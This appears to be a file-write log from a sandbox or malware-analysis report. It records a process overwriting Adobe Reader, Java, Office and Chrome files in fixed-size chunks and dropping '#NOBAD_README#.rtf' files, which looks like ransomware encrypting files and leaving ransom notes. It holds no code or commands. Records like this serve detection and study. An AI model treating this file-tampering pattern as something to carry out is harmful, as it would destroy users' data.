| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | size = 3107 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | size = 1818 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\COPYRIGHT | size = 4660 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\sRGB.pf | size = 4560 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_pt_BR.properties | size = 4701 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp | size = 8677 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.access | size = 5414 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | size = 1858 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp | size = 1818 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Stamp.aapp | size = 1985 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | size = 61440 |
|
4 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | size = 1836 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif | size = 2223 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif | size = 2868 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | size = 2671 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif | size = 2418 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif | size = 1972 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\sound.properties | size = 2626 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\javaws.policy | size = 1514 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 61440 |
|
4 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 1992 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | size = 1972 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | size = 1710 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif | size = 2859 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif | size = 2222 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif | size = 1638 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInTray.gif | size = 2411 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css | size = 3954 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | size = 1714 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | size = 1474 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png | size = 1722 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js | size = 4984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js | size = 5174 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js | size = 5287 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 1683 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp | size = 1817 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp | size = 1819 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | size = 2247 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css | size = 3931 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adc_logo.png | size = 5125 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png | size = 5901 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png | size = 5125 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif | size = 2545 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png | size = 1713 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png | size = 1692 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif | size = 1482 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js | size = 5206 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js | size = 5168 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\ui-strings.js | size = 5893 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png | size = 1722 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png | size = 8371 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png | size = 1713 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | size = 1692 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif | size = 1474 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\config.js | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js | size = 5062 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js | size = 5147 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js | size = 4984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | size = 4348 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js | size = 5526 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api | size = 61440 |
|
17 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp | size = 1828 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | size = 3047 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 34184 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 61440 |
|
136 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | size = 61440 |
|
4 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js | size = 8848 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js | size = 9413 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png | size = 2119 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png | size = 1595 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js | size = 3205 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js | size = 3264 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#NOBAD_README#.rtf | size = 8677 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#NOBAD_README#.rtf | size = 4101 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | size = 1802 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js | size = 3172 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js | size = 2686 |
|
1 | |
